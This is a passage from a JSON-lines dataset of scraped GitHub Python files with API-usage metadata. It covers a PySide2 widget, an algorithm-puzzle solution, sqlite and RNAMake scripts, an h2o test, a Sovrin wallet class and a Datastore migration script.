"PyQt5.QtCore", "line_number": 38, "usage_type": "name"}, {"api_name": "PyQt5.QtWidgets.QDialogButtonBox", "line_number": 41, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets", "line_number": 41, "usage_type": "name"}, {"api_name": "PyQt5.QtWidgets.QDialogButtonBox", "line_number": 42, "usage_type": "attribute"}, {"api_name": "PyQt5.QtWidgets", "line_number": 42, "usage_type": "name"}, {"api_name": "PyQt5.QtWidgets.QDialogButtonBox", "line_number": 43, "usage_type": "attribute"}, {"api_name": "PyQt5.QtWidgets", "line_number": 43, "usage_type": "name"}, {"api_name": "PyQt5.QtWidgets.QPushButton", "line_number": 45, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets", "line_number": 45, "usage_type": "name"}, {"api_name": "PyQt5.QtWidgets.QPushButton", "line_number": 46, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets", "line_number": 46, "usage_type": "name"}, {"api_name": "PyQt5.QtWidgets.QVBoxLayout", "line_number": 62, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets", "line_number": 62, "usage_type": "name"}, {"api_name": "PyQt5.QtWidgets.QCheckBox", "line_number": 65, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets", "line_number": 65, "usage_type": "name"}]} +{"seq_id": "38526033576", "text": "\nfrom PySide2 import (QtWidgets, QtCore, QtGui)\n\nclass DialogColumn(QtWidgets.QFrame):\n\t\n\tdef __init__(self):\n\t\t\n\t\tQtWidgets.QFrame.__init__(self)\n\t\t\n\t\tself.setLayout(QtWidgets.QVBoxLayout())\n\t\tself.setSizePolicy(QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Expanding)\n\t\tself.layout().setContentsMargins(0, 0, 0, 0)\n\t\tself.layout().addStretch()\n\t\t\n#\t\tself.setStyleSheet(\"DialogColumn {border: 1px solid gray;}\")\n\t\n\tdef add_widget(self, widget):\n\t\t\n\t\tself.layout().insertWidget(self.layout().count() - 1, widget)\n", "repo_name": "demjanp/deposit_gui", "sub_path": "src/deposit_gui/view/vusertools_elements/dialog/dialog_column.py", "file_name": "dialog_column.py", "file_ext": "py", "file_size_in_byte": 522, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "61", "api": [{"api_name": "PySide2.QtWidgets.QFrame", "line_number": 4, "usage_type": "attribute"}, {"api_name": "PySide2.QtWidgets", "line_number": 4, "usage_type": "name"}, {"api_name": "PySide2.QtWidgets.QFrame.__init__", "line_number": 8, "usage_type": "call"}, {"api_name": "PySide2.QtWidgets.QFrame", "line_number": 8, "usage_type": "attribute"}, {"api_name": "PySide2.QtWidgets", "line_number": 8, "usage_type": "name"}, {"api_name": "PySide2.QtWidgets.QVBoxLayout", "line_number": 10, "usage_type": "call"}, {"api_name": "PySide2.QtWidgets", "line_number": 10, "usage_type": "name"}, {"api_name": "PySide2.QtWidgets.QSizePolicy", "line_number": 11, "usage_type": "attribute"}, {"api_name": "PySide2.QtWidgets", "line_number": 11, "usage_type": "name"}]} +{"seq_id": "13873617409", "text": "import sys\nfrom collections import deque\n\nn, k = map(int, sys.stdin.readline().split())\narr = [[] for _ in range(n)]\ninp = list(map(int, sys.stdin.readline().split()))\nfor i in range(n):\n arr[i].append(inp[i])\nqueue = deque(arr)\n\ndef addFish():\n minA = min(queue)[0]\n # print(minA)\n for i in range(len(queue)):\n if queue[i][0] == minA:\n queue[i][0] += 1\n\n\ndef putOn():\n popleft = queue.popleft()\n for i in popleft:\n queue[0].append(i)\n # print(queue)\n\ndef airTurn():\n while True:\n until = -1\n for i in range(len(queue)-1, -1, -1):\n if len(queue[i]) >= 2:\n if len(queue)-1 - i < len(queue[i]):\n return\n until = i\n break\n tmp = deque()\n for i in range(until+1):\n popleft = queue.popleft()\n tmp.appendleft(popleft)\n\n for popleft in tmp:\n k = 0\n for i in popleft:\n queue[k].append(i)\n k += 1\n\ndef fishDivide():\n dx = [-1, 0, 1, 0]\n dy = [0, 1, 0, -1]\n\n tempArr = [[0] * (len(queue[0])) for _ in range(len(queue))]\n\n for x in range(len(queue)):\n for y in range(len(queue[x])):\n curr = queue[x][y]\n for i in range(4):\n nx = x + dx[i]\n ny = y + dy[i]\n if 0 <= nx < len(queue) and 0 <= ny < len(queue[x]):\n # print(\"he\",x, y, len(queue), len(queue[x]))\n # print(nx, ny)\n try:\n gap = queue[nx][ny] - curr\n except:\n continue\n d = abs(gap) // 5\n # print(\"check\", x, y, nx, ny, d)\n if d > 0:\n if queue[nx][ny] > queue[x][y]:\n tempArr[nx][ny] -= d\n tempArr[x][y] += d\n else:\n tempArr[nx][ny] += d\n tempArr[x][y] -= d\n\n for x in range(len(tempArr)):\n for y in range(len(tempArr[x])):\n try:\n queue[x][y] += (tempArr[x][y] // 2)\n except:\n continue\n\ndef reLine():\n tmp = []\n while queue:\n popleft = queue.popleft()\n for j in popleft:\n tmp.append(j)\n\n for i in tmp:\n queue.append([i])\n\ndef turnHalf():\n\n for _ in range(2):\n length = len(queue) // 2 - 1\n tmp = deque()\n i = 0\n while i <= length:\n popleft = queue.popleft()\n t = []\n while popleft:\n pop = popleft.pop()\n t.append(pop)\n tmp.appendleft(t)\n i += 1\n\n k = 0\n for node in tmp:\n for j in node:\n queue[k].append(j)\n k += 1\n\n\n\ncnt = 0\nwhile max(queue)[0] - min(queue)[0] > k:\n cnt += 1\n addFish()\n # print(queue)\n putOn()\n # print(queue)\n airTurn()\n # print(queue)\n fishDivide()\n # print(queue)\n reLine()\n # print(queue)\n turnHalf()\n # print(queue)\n fishDivide()\n # print(queue)\n reLine()\n # print(queue)\n\nprint(cnt)", "repo_name": "whiskey21/my-algorithm-book", "sub_path": "삼성A형/어항정리.py", "file_name": "어항정리.py", "file_ext": "py", "file_size_in_byte": 3226, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "sys.stdin.readline", "line_number": 4, "usage_type": "call"}, {"api_name": "sys.stdin", "line_number": 4, "usage_type": "attribute"}, {"api_name": "sys.stdin.readline", "line_number": 6, "usage_type": "call"}, {"api_name": "sys.stdin", "line_number": 6, "usage_type": "attribute"}, {"api_name": "collections.deque", "line_number": 9, "usage_type": "call"}, {"api_name": "collections.deque", "line_number": 34, "usage_type": "call"}, {"api_name": "collections.deque", "line_number": 95, "usage_type": "call"}]} +{"seq_id": "38141783219", "text": "#!/usr/bin/python\n\nimport sqlite3\n\ndef connect():\n conn = sqlite3.connect('bot_db.db')\n define_table(conn)\n return conn.cursor()\n\n\ndef define_table(conn):\n conn.execute('''\n CREATE TABLE HOUSE\n (ID INT PRIMARY KEY NOT NULL,\n TIMESTAMP TEXT NOT NULL,\n PRICE TEXT NOT NULL,\n ADDRESS TEXT,\n URL TEXT);''')\n print(\"Table created successfully\")\n\n\ndef backup(conn, data):\n for d in data:\n conn.execute(\"INSERT INTO HOUSE (TIMESTAMP, PRICE, ADDRESS, URL) VALUES (\" +\n data.date + \",\" + data.price + \",\" + data.address + \",\" + data.url + \");\")\n\n conn.commit()\n print(\"Records backed up\")\n", "repo_name": "kevind992/daft-bot", "sub_path": "daft-bot/database/sqlite.py", "file_name": "sqlite.py", "file_ext": "py", "file_size_in_byte": 719, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "sqlite3.connect", "line_number": 6, "usage_type": "call"}]} +{"seq_id": "4751458881", "text": "import pandas as pd\nimport sys\nimport argparse\nimport glob\n\nfrom rnamake import resource_manager as rm\nfrom rnamake import motif_ensemble, vienna, util\n\ndef parse_args():\n parser = argparse.ArgumentParser()\n parser.add_argument('-pdb_dir', help='directory of pdbs', required=True)\n parser.add_argument('-weights', help='directory of pdbs')\n\n args = parser.parse_args()\n\n return args\n\ndef build_me_sub(org_m, new_motifs, scores, extra_mse_file=\"test.dat\"):\n f = open(extra_mse_file, \"w\")\n\n for i, end in enumerate(org_m.ends):\n all_ms = []\n all_scores = []\n\n for j, new_m in enumerate(new_motifs):\n try:\n mi = rm.manager.get_motif(name=new_m.name, end_name=new_m.ends[i].name())\n except:\n continue\n\n try:\n mi.to_str()\n except:\n continue\n\n all_ms.append(mi)\n all_scores.append(scores[j])\n\n me = motif_ensemble.MotifEnsemble()\n me.setup(org_m.end_ids[i], all_ms, all_scores)\n org_m_key = org_m.name + \"-\" + end.name()\n\n f.write(org_m_key + \"!!\" + me.to_str() + \"\\n\")\n\n\n f.flush()\n f.close()\n\ndef parse_weights_file(weights_file):\n f = open(weights_file)\n lines = f.readlines()\n f.close()\n\n d = {}\n for l in lines:\n spl = l.split()\n if len(spl) < 2:\n continue\n d[spl[0]] = float(spl[1])\n return d\n\n\nif __name__ == '__main__':\n args = parse_args()\n\n name = \"test_motif\"\n\n pdbs = glob.glob(args.pdb_dir + \"/*.pdb\")\n motifs = []\n scores = []\n\n start_m = rm.manager.get_structure(pdbs[0], name)\n\n # needs a new motif name for RNAMAke to recognize this sequence / secondary structure\n org_m = start_m\n needs_new_motif = False\n try:\n m = rm.manager.get_motif(end_id=start_m.end_ids[0])\n org_m = m\n except:\n needs_new_motif = True\n\n score_dict = {}\n if args.weights:\n score_dict = parse_weights_file(args.weights)\n\n for pdb in pdbs:\n pdb_name = util.filename(pdb)\n rm.manager.add_motif(pdb, name=pdb_name, remove_extra_bps=1)\n\n if pdb_name in score_dict:\n scores.append(score_dict[pdb_name])\n else:\n scores.append(1)\n\n motifs.append(rm.manager.get_motif(name=pdb_name))\n\n build_me_sub(org_m, motifs, scores)\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n", "repo_name": "jyesselm/SimulateTectos", "sub_path": "simulate_tectos/bin/build_motif_ensemble_from_pdbs.py", "file_name": "build_motif_ensemble_from_pdbs.py", "file_ext": "py", "file_size_in_byte": 2406, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "argparse.ArgumentParser", "line_number": 10, "usage_type": "call"}, {"api_name": "rnamake.resource_manager.manager.get_motif", "line_number": 27, "usage_type": "call"}, {"api_name": "rnamake.resource_manager.manager", "line_number": 27, "usage_type": "attribute"}, {"api_name": "rnamake.resource_manager", "line_number": 27, "usage_type": "name"}, {"api_name": "rnamake.motif_ensemble.MotifEnsemble", "line_number": 39, "usage_type": "call"}, {"api_name": "rnamake.motif_ensemble", "line_number": 39, "usage_type": "name"}, {"api_name": "glob.glob", "line_number": 68, "usage_type": "call"}, {"api_name": "rnamake.resource_manager.manager.get_structure", "line_number": 72, "usage_type": "call"}, {"api_name": "rnamake.resource_manager.manager", "line_number": 72, "usage_type": "attribute"}, {"api_name": "rnamake.resource_manager", "line_number": 72, "usage_type": "name"}, {"api_name": "rnamake.resource_manager.manager.get_motif", "line_number": 78, "usage_type": "call"}, {"api_name": "rnamake.resource_manager.manager", "line_number": 78, "usage_type": "attribute"}, {"api_name": "rnamake.resource_manager", "line_number": 78, "usage_type": "name"}, {"api_name": "rnamake.util.filename", "line_number": 88, "usage_type": "call"}, {"api_name": "rnamake.util", "line_number": 88, "usage_type": "name"}, {"api_name": "rnamake.resource_manager.manager.add_motif", "line_number": 89, "usage_type": "call"}, {"api_name": "rnamake.resource_manager.manager", "line_number": 89, "usage_type": "attribute"}, {"api_name": "rnamake.resource_manager", "line_number": 89, "usage_type": "name"}, {"api_name": "rnamake.resource_manager.manager.get_motif", "line_number": 96, "usage_type": "call"}, {"api_name": "rnamake.resource_manager.manager", "line_number": 96, "usage_type": "attribute"}, {"api_name": "rnamake.resource_manager", "line_number": 96, "usage_type": "name"}]} +{"seq_id": "13350638374", "text": "#!/usr/bin/env python\nimport h2o\nfrom tests import pyunit_utils\n\ndef test_4673():\n fr = h2o.import_file(pyunit_utils.locate(\"smalldata/iris/iris_wheader.csv\"))\n # If this didn't throw an exception in Python 3.6, then we're good.\n print(fr.mean())\n fr.apply(lambda x: x[\"class\"] + x[0], axis=1).show()\n\n\nif __name__ == \"__main__\":\n pyunit_utils.standalone_test(test_4673)\nelse:\n test_4673()\n", "repo_name": "h2oai/h2o-3", "sub_path": "h2o-py/tests/testdir_jira/pyunit_pubdev_4673.py", "file_name": "pyunit_pubdev_4673.py", "file_ext": "py", "file_size_in_byte": 408, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 6553, "dataset": "github-code", "pt": "61", "api": [{"api_name": "h2o.import_file", "line_number": 6, "usage_type": "call"}, {"api_name": "tests.pyunit_utils.locate", "line_number": 6, "usage_type": "call"}, {"api_name": "tests.pyunit_utils", "line_number": 6, "usage_type": "name"}, {"api_name": "tests.pyunit_utils.standalone_test", "line_number": 13, "usage_type": "call"}, {"api_name": "tests.pyunit_utils", "line_number": 13, "usage_type": "name"}]} +{"seq_id": "10315670018", "text": "import datetime\nimport json\nimport operator\nfrom collections import deque\nfrom typing import Dict, List\nfrom typing import Optional\n\nfrom ledger.util import F\nfrom plenum.client.wallet import Wallet as PWallet\nfrom plenum.common.did_method import DidMethods\nfrom plenum.common.log import getlogger\nfrom plenum.common.txn import TXN_TYPE, TARGET_NYM, DATA, \\\n IDENTIFIER, NYM, ROLE, VERKEY, NODE\nfrom plenum.common.types import Identifier, f\n\nfrom sovrin.client.wallet.attribute import Attribute, AttributeKey\nfrom sovrin.client.wallet.link import Link\nfrom sovrin.client.wallet.node import Node\nfrom sovrin.client.wallet.sponsoring import Sponsoring\nfrom sovrin.client.wallet.upgrade import Upgrade\nfrom sovrin.common.did_method import DefaultDidMethods\nfrom sovrin.common.exceptions import LinkNotFound\nfrom sovrin.common.identity import Identity\nfrom sovrin.common.txn import ATTRIB, GET_TXNS, GET_ATTR, GET_NYM, POOL_UPGRADE\n\nENCODING = \"utf-8\"\n\nlogger = getlogger()\n\n\n# TODO: Maybe we should have a thinner wallet which should not have ProverWallet\nclass Wallet(PWallet, Sponsoring):\n clientNotPresentMsg = \"The wallet does not have a client associated with it\"\n\n def __init__(self,\n name: str,\n supportedDidMethods: DidMethods=None):\n PWallet.__init__(self,\n name,\n supportedDidMethods or DefaultDidMethods)\n Sponsoring.__init__(self)\n self._attributes = {} # type: Dict[(str, Identifier,\n # Optional[Identifier]), Attribute]\n\n self._nodes = {}\n self._upgrades = {}\n\n self._links = {} # type: Dict[str, Link]\n self.knownIds = {} # type: Dict[str, Identifier]\n\n # transactions not yet submitted\n self._pending = deque() # type Tuple[Request, Tuple[str, Identifier,\n # Optional[Identifier]]\n\n # pending transactions that have been prepared (probably submitted)\n self._prepared = {} # type: Dict[(Identifier, int), Request]\n self.lastKnownSeqs = {} # type: Dict[str, int]\n\n self.replyHandler = {\n ATTRIB: self._attribReply,\n GET_ATTR: self._getAttrReply,\n NYM: self._nymReply,\n GET_NYM: self._getNymReply,\n GET_TXNS: self._getTxnsReply,\n NODE: self._nodeReply,\n POOL_UPGRADE: self._poolUpgradeReply\n }\n\n @property\n def pendingCount(self):\n return len(self._pending)\n\n @staticmethod\n def _isMatchingName(needle, haystack):\n return needle.lower() in haystack.lower()\n\n # TODO: The names getMatchingLinksWithAvailableClaim and\n # getMatchingLinksWithReceivedClaim should be fixed. Difference between\n # `AvailableClaim` and `ReceivedClaim` is that for ReceivedClaim we\n # have attribute values from issuer.\n\n # TODO: Few of the below methods have duplicate code, need to refactor it\n def getMatchingLinksWithAvailableClaim(self, claimName=None):\n matchingLinkAndAvailableClaim = []\n for k, li in self._links.items():\n for cl in li.availableClaims:\n if not claimName or Wallet._isMatchingName(claimName, cl[0]):\n matchingLinkAndAvailableClaim.append((li, cl))\n return matchingLinkAndAvailableClaim\n\n def getMatchingLinksWithClaimReq(self, claimReqName, linkName=None):\n matchingLinkAndClaimReq = []\n for k, li in self._links.items():\n for cpr in li.claimProofRequests:\n if Wallet._isMatchingName(claimReqName, cpr.name):\n if linkName is None or Wallet._isMatchingName(linkName,\n li.name):\n matchingLinkAndClaimReq.append((li, cpr))\n return matchingLinkAndClaimReq\n\n def addAttribute(self, attrib: Attribute):\n \"\"\"\n Used to create a new attribute on Sovrin\n :param attrib: attribute to add\n :return: number of pending txns\n \"\"\"\n self._attributes[attrib.key()] = attrib\n req = attrib.ledgerRequest()\n if req:\n self.pendRequest(req, attrib.key())\n return len(self._pending)\n\n def addNode(self, node: Node):\n \"\"\"\n Used to add a new node on Sovrin\n :param node: Node\n :return: number of pending txns\n \"\"\"\n self._nodes[node.id] = node\n req = node.ledgerRequest()\n if req:\n self.pendRequest(req, node.id)\n return len(self._pending)\n\n def doPoolUpgrade(self, upgrade: Upgrade):\n \"\"\"\n Used to send a new code upgrade\n :param upgrade: upgrade data\n :return: number of pending txns\n \"\"\"\n key = upgrade.key\n self._upgrades[key] = upgrade\n req = upgrade.ledgerRequest()\n if req:\n self.pendRequest(req, key)\n return len(self._pending)\n\n def hasAttribute(self, key: AttributeKey) -> bool:\n \"\"\"\n Checks if attribute is present in the wallet\n @param key: Attribute unique key\n @return:\n \"\"\"\n return bool(self.getAttribute(key))\n\n def getAttribute(self, key: AttributeKey):\n return self._attributes.get(key.key())\n\n def getNode(self, id: Identifier):\n return self._nodes.get(id)\n\n def getPoolUpgrade(self, key: str):\n return self._upgrades.get(key)\n\n def getAttributesForNym(self, idr: Identifier):\n return [a for a in self._attributes.values() if a.dest == idr]\n\n def addLink(self, link: Link):\n self._links[link.key] = link\n\n def getLink(self, name, required=False) -> Link:\n l = self._links.get(name)\n if not l and required:\n logger.debug(\"Wallet has links {}\".format(self._links))\n raise LinkNotFound(l.name)\n return l\n\n def addLastKnownSeqs(self, identifier, seqNo):\n self.lastKnownSeqs[identifier] = seqNo\n\n def getLastKnownSeqs(self, identifier):\n return self.lastKnownSeqs.get(identifier)\n\n def getPendingTxnRequests(self, *identifiers):\n if not identifiers:\n identifiers = self.idsToSigners.keys()\n else:\n identifiers = set(identifiers).intersection(\n set(self.idsToSigners.keys()))\n requests = []\n for identifier in identifiers:\n lastTxn = self.getLastKnownSeqs(identifier)\n op = {\n TARGET_NYM: identifier,\n TXN_TYPE: GET_TXNS,\n }\n if lastTxn:\n op[DATA] = lastTxn\n requests.append(self.signOp(op, identifier=identifier))\n return requests\n\n def pendSyncRequests(self):\n pendingTxnsReqs = self.getPendingTxnRequests()\n for req in pendingTxnsReqs:\n self.pendRequest(req)\n\n def preparePending(self):\n new = {}\n while self._pending:\n req, key = self._pending.pop()\n sreq = self.signRequest(req)\n new[req.identifier, req.reqId] = sreq, key\n self._prepared.update(new)\n # Return request in the order they were submitted\n return sorted([req for req, _ in new.values()],\n key=operator.attrgetter(\"reqId\"))\n\n def handleIncomingReply(self, observer_name, reqId, frm, result,\n numReplies):\n \"\"\"\n Called by an external entity, like a Client, to notify of incoming\n replies\n :return:\n \"\"\"\n preparedReq = self._prepared.get((result[IDENTIFIER], reqId))\n if not preparedReq:\n raise RuntimeError('no matching prepared value for {},{}'.\n format(result[IDENTIFIER], reqId))\n typ = result.get(TXN_TYPE)\n if typ and typ in self.replyHandler:\n self.replyHandler[typ](result, preparedReq)\n # else:\n # raise NotImplementedError('No handler for {}'.format(typ))\n\n def _attribReply(self, result, preparedReq):\n _, attrKey = preparedReq\n attrib = self.getAttribute(AttributeKey(*attrKey))\n attrib.seqNo = result[F.seqNo.name]\n\n def _getAttrReply(self, result, preparedReq):\n # TODO: Confirm if we need to add the retrieved attribute to the wallet.\n # If yes then change the graph query on node to return the sequence\n # number of the attribute txn too.\n _, attrKey = preparedReq\n attrib = self.getAttribute(AttributeKey(*attrKey))\n if DATA in result:\n attrib.value = result[DATA]\n attrib.seqNo = result[F.seqNo.name]\n else:\n logger.debug(\"No attribute found\")\n\n def _nymReply(self, result, preparedReq):\n target = result[TARGET_NYM]\n idy = self._sponsored.get(target)\n if idy:\n idy.seqNo = result[F.seqNo.name]\n else:\n logger.warn(\"Target {} not found in sponsored\".format(target))\n\n def _nodeReply(self, result, preparedReq):\n _, nodeKey = preparedReq\n node = self.getNode(nodeKey)\n node.seqNo = result[F.seqNo.name]\n\n def _poolUpgradeReply(self, result, preparedReq):\n _, upgKey = preparedReq\n upgrade = self.getPoolUpgrade(upgKey)\n upgrade.seqNo = result[F.seqNo.name]\n\n def _getNymReply(self, result, preparedReq):\n jsonData = result.get(DATA)\n if jsonData:\n data = json.loads(jsonData)\n nym = data.get(TARGET_NYM)\n idy = self.knownIds.get(nym)\n if idy:\n idy.role = data.get(ROLE)\n idy.sponsor = data.get(f.IDENTIFIER.nm)\n idy.last_synced = datetime.datetime.utcnow()\n idy.verkey = data.get(VERKEY)\n # TODO: THE GET_NYM reply should contain the sequence number of\n # the NYM transaction\n\n def _getTxnsReply(self, result, preparedReq):\n # TODO\n pass\n\n def pendRequest(self, req, key=None):\n self._pending.appendleft((req, key))\n\n def getLinkInvitationByTarget(self, target: str) -> Link:\n for k, li in self._links.items():\n if li.remoteIdentifier == target:\n return li\n\n def getLinkInvitation(self, name: str):\n return self._links.get(name)\n\n def getMatchingLinks(self, name: str) -> List[Link]:\n allMatched = []\n for k, v in self._links.items():\n if self._isMatchingName(name, k):\n allMatched.append(v)\n return allMatched\n\n # TODO: sender by default should be `self.defaultId`\n def requestAttribute(self, attrib: Attribute, sender):\n \"\"\"\n Used to get a raw attribute from Sovrin\n :param attrib: attribute to add\n :return: number of pending txns\n \"\"\"\n self._attributes[attrib.key()] = attrib\n req = attrib.getRequest(sender)\n if req:\n return self.prepReq(req, key=attrib.key())\n\n # TODO: sender by default should be `self.defaultId`\n def requestIdentity(self, identity: Identity, sender):\n # Used to get a nym from Sovrin\n self.knownIds[identity.identifier] = identity\n req = identity.getRequest(sender)\n if req:\n return self.prepReq(req)\n\n def prepReq(self, req, key=None):\n self.pendRequest(req, key=key)\n return self.preparePending()[0]\n\n # DEPR\n # Why shouldn't we fetch link by nonce\n def getLinkByNonce(self, nonce) -> Optional[Link]:\n for _, li in self._links.items():\n if li.invitationNonce == nonce:\n return li\n\n def getLinkByInternalId(self, internalId) -> Optional[Link]:\n for _, li in self._links.items():\n if li.internalId == internalId:\n return li\n\n def getIdentity(self, idr):\n # TODO, Question: Should it consider self owned identities too or\n # should it just have identities that are retrieved from the DL\n return self.knownIds.get(idr)", "repo_name": "sovrin-foundation/old-sovrin", "sub_path": "sovrin/client/wallet/wallet.py", "file_name": "wallet.py", "file_ext": "py", "file_size_in_byte": 11957, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 53, "dataset": "github-code", "pt": "61", "api": [{"api_name": "plenum.common.log.getlogger", "line_number": 28, "usage_type": "call"}, {"api_name": "plenum.client.wallet.Wallet", "line_number": 32, "usage_type": "name"}, {"api_name": "sovrin.client.wallet.sponsoring.Sponsoring", "line_number": 32, "usage_type": "name"}, {"api_name": "plenum.common.did_method.DidMethods", "line_number": 37, "usage_type": "name"}, {"api_name": "plenum.client.wallet.Wallet.__init__", "line_number": 38, "usage_type": "call"}, {"api_name": "plenum.client.wallet.Wallet", "line_number": 38, "usage_type": "name"}, {"api_name": "sovrin.common.did_method.DefaultDidMethods", "line_number": 40, "usage_type": "name"}, {"api_name": "sovrin.client.wallet.sponsoring.Sponsoring.__init__", "line_number": 41, "usage_type": "call"}, {"api_name": "sovrin.client.wallet.sponsoring.Sponsoring", "line_number": 41, "usage_type": "name"}, {"api_name": "collections.deque", "line_number": 52, "usage_type": "call"}, {"api_name": "sovrin.common.txn.ATTRIB", "line_number": 60, "usage_type": "name"}, {"api_name": "sovrin.common.txn.GET_ATTR", "line_number": 61, "usage_type": "name"}, {"api_name": "plenum.common.txn.NYM", "line_number": 62, "usage_type": "name"}, {"api_name": "sovrin.common.txn.GET_NYM", "line_number": 63, "usage_type": "name"}, {"api_name": "sovrin.common.txn.GET_TXNS", "line_number": 64, "usage_type": "name"}, {"api_name": "plenum.common.txn.NODE", "line_number": 65, "usage_type": "name"}, {"api_name": "sovrin.common.txn.POOL_UPGRADE", "line_number": 66, "usage_type": "name"}, {"api_name": "sovrin.client.wallet.attribute.Attribute", "line_number": 101, "usage_type": "name"}, {"api_name": "sovrin.client.wallet.node.Node", "line_number": 113, "usage_type": "name"}, {"api_name": "sovrin.client.wallet.upgrade.Upgrade", "line_number": 125, "usage_type": "name"}, {"api_name": "sovrin.client.wallet.attribute.AttributeKey", "line_number": 138, "usage_type": "name"}, {"api_name": "sovrin.client.wallet.attribute.AttributeKey", "line_number": 146, "usage_type": "name"}, {"api_name": "plenum.common.types.Identifier", "line_number": 149, "usage_type": "name"}, {"api_name": "plenum.common.types.Identifier", "line_number": 155, "usage_type": "name"}, {"api_name": "sovrin.client.wallet.link.Link", "line_number": 158, "usage_type": "name"}, {"api_name": "sovrin.common.exceptions.LinkNotFound", "line_number": 165, "usage_type": "call"}, {"api_name": "sovrin.client.wallet.link.Link", "line_number": 161, "usage_type": "name"}, {"api_name": "plenum.common.txn.TARGET_NYM", "line_number": 184, "usage_type": "name"}, {"api_name": "plenum.common.txn.TXN_TYPE", "line_number": 185, "usage_type": "name"}, {"api_name": "sovrin.common.txn.GET_TXNS", "line_number": 185, "usage_type": "name"}, {"api_name": "plenum.common.txn.DATA", "line_number": 188, "usage_type": "name"}, {"api_name": "operator.attrgetter", "line_number": 206, "usage_type": "call"}, {"api_name": "plenum.common.txn.IDENTIFIER", "line_number": 215, "usage_type": "name"}, {"api_name": "plenum.common.txn.IDENTIFIER", "line_number": 218, "usage_type": "name"}, {"api_name": "plenum.common.txn.TXN_TYPE", "line_number": 219, "usage_type": "argument"}, {"api_name": "sovrin.client.wallet.attribute.AttributeKey", "line_number": 227, "usage_type": "call"}, {"api_name": "ledger.util.F.seqNo", "line_number": 228, "usage_type": "attribute"}, {"api_name": "ledger.util.F", "line_number": 228, "usage_type": "name"}, {"api_name": "sovrin.client.wallet.attribute.AttributeKey", "line_number": 235, "usage_type": "call"}, {"api_name": "plenum.common.txn.DATA", "line_number": 236, "usage_type": "name"}, {"api_name": "plenum.common.txn.DATA", "line_number": 237, "usage_type": "name"}, {"api_name": "ledger.util.F.seqNo", "line_number": 238, "usage_type": "attribute"}, {"api_name": "ledger.util.F", "line_number": 238, "usage_type": "name"}, {"api_name": "plenum.common.txn.TARGET_NYM", "line_number": 243, "usage_type": "name"}, {"api_name": "ledger.util.F.seqNo", "line_number": 246, "usage_type": "attribute"}, {"api_name": "ledger.util.F", "line_number": 246, "usage_type": "name"}, {"api_name": "ledger.util.F.seqNo", "line_number": 253, "usage_type": "attribute"}, {"api_name": "ledger.util.F", "line_number": 253, "usage_type": "name"}, {"api_name": "ledger.util.F.seqNo", "line_number": 258, "usage_type": "attribute"}, {"api_name": "ledger.util.F", "line_number": 258, "usage_type": "name"}, {"api_name": "plenum.common.txn.DATA", "line_number": 261, "usage_type": "argument"}, {"api_name": "json.loads", "line_number": 263, "usage_type": "call"}, {"api_name": "plenum.common.txn.TARGET_NYM", "line_number": 264, "usage_type": "argument"}, {"api_name": "plenum.common.txn.ROLE", "line_number": 267, "usage_type": "argument"}, {"api_name": "plenum.common.types.f.IDENTIFIER", "line_number": 268, "usage_type": "attribute"}, {"api_name": "plenum.common.types.f", "line_number": 268, "usage_type": "name"}, {"api_name": "datetime.datetime.utcnow", "line_number": 269, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 269, "usage_type": "attribute"}, {"api_name": "plenum.common.txn.VERKEY", "line_number": 270, "usage_type": "argument"}, {"api_name": "sovrin.client.wallet.link.Link", "line_number": 281, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 289, "usage_type": "name"}, {"api_name": "sovrin.client.wallet.link.Link", "line_number": 289, "usage_type": "name"}, {"api_name": "sovrin.client.wallet.attribute.Attribute", "line_number": 297, "usage_type": "name"}, {"api_name": "sovrin.common.identity.Identity", "line_number": 309, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 322, "usage_type": "name"}, {"api_name": "sovrin.client.wallet.link.Link", "line_number": 322, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 327, "usage_type": "name"}, {"api_name": "sovrin.client.wallet.link.Link", "line_number": 327, "usage_type": "name"}]} +{"seq_id": "28896253216", "text": "\"\"\"\nMigration script for NEXTAPI-1625. Adds linked_at and connected_at fields to Org kind.\n\"\"\"\nimport sys\nfrom google.cloud import datastore\n\n\ndef main(project_id):\n \"\"\"\n Adds linked_at and connected_at fields to Org kind entries which do not have the fields already. It uses the\n created_at value for linked_at and connected_at as that's the best guess we have.\n \"\"\"\n client = datastore.Client(project_id)\n query = client.query(kind='Org')\n\n for org in query.fetch():\n print(\"processing {}\".format(org.key.name))\n save = False\n\n if org.get('linked_at'):\n print(\" linked_at already exists ({})\".format(org['linked_at']))\n else:\n print(\" setting linked_at to {}\".format(org['created_at']))\n org['linked_at'] = org['created_at']\n save = True\n\n if org.get('connected_at'):\n print(\" connected_at already exists ({})\".format(org['connected_at']))\n else:\n print(\" setting connected_at to {}\".format(org['created_at']))\n org['connected_at'] = org['created_at']\n save = True\n\n if save:\n client.put(org)\n\n\nif __name__ == '__main__':\n if len(sys.argv) != 2:\n print(\"usage: migrate.py PROJECT_ID\")\n print(\" PROJECT_ID example: acuit-gl-sync-dev\")\n exit(1)\n\n main(sys.argv[1])\n", "repo_name": "SoulMen007/acuit-gl-ingester-zuora", "sub_path": "migrations/NEXTAPI-1625/migrate.py", "file_name": "migrate.py", "file_ext": "py", "file_size_in_byte": 1371, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "google.cloud.datastore.Client", "line_number": 13, "usage_type": "call"}, {"api_name": "google.cloud.datastore", "line_number": 13, "usage_type": "name"}, {"api_name": "sys.argv", "line_number": 39, "usage_type": "attribute"}, {"api_name": "sys.argv", 